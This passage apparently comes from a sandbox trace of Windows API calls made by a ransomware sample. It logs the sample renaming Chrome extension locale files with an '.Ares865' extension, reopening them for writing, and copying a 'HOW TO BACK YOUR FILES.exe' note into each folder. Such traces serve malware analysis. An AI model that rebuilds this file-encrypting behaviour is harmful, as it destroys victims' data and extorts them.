dwFlags=0x1) returned 1 [0102.894] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.895] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=253) returned 1 [0102.897] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr" [0102.897] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr" [0102.897] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.898] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.898] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.898] GetLastError () returned 0x0 [0102.899] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.899] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86fc9870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ece3fe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ece3fe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.899] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.899] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.899] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.Ares865") returned 161 [0102.899] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.900] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sr\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.901] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=287) returned 1 [0102.904] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl" [0102.904] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl" [0102.904] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.905] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.905] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.905] GetLastError () returned 0x0 [0102.906] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.906] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86fc9870, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ece3fe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ece3fe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.906] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.906] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.906] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.Ares865") returned 161 [0102.906] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.907] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sl\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.908] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=268) returned 1 [0102.912] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk" [0102.912] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk" [0102.913] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.913] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.913] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.914] GetLastError () returned 0x0 [0102.914] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.914] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86f57450, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ed0a140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ed0a140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.914] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.914] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.914] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.Ares865") returned 161 [0102.914] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.916] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sk\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.917] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=274) returned 1 [0102.922] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru" [0102.922] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru" [0102.922] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.923] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.923] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.924] GetLastError () returned 0x0 [0102.924] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.924] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86f57450, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ed0a140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ed0a140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.924] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.924] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.924] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.Ares865") returned 161 [0102.924] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.926] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.926] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=338) returned 1 [0102.930] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro" [0102.930] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro" [0102.930] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0102.930] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\how to back your files.exe"), bFailIfExists=1) returned 0 [0102.930] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0102.931] GetLastError () returned 0x0 [0102.931] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0102.931] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x86f57450, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4ed0a140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ed0a140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0102.931] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0102.931] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0102.931] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.Ares865") returned 161 [0102.931] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.ares865"), dwFlags=0x1) returned 1 [0102.933] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ro\\messages.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0102.933] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=281) returned 1 [0102.936] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\pt_PT") returned="C:\\Users\\5p5NrGJn0jS 